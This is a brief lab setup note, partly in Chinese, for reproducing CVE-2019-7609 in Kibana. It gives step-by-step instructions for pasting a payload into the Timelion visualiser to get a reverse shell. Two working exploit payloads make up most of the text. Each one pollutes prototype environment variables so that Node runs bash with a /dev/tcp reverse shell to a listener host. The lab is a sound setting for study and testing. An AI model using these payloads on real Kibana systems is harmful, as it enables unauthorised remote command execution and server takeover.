
docker lab setup for kibana-7609
Kibana-7609 的 Docker 实验室设置
参考:https://github.com/mpgn/CVE-2019-7609
打开 Kibana
将以下其中一个 payload 粘贴到 Timelion 可视化工具中
点击运行
在左侧面板中点击 Canvas
你的反弹 Shell 应该会出现!:)
payload 由 @securityMB 提供
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')
payload 由 @chybeta 提供
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -c 'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1'");//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')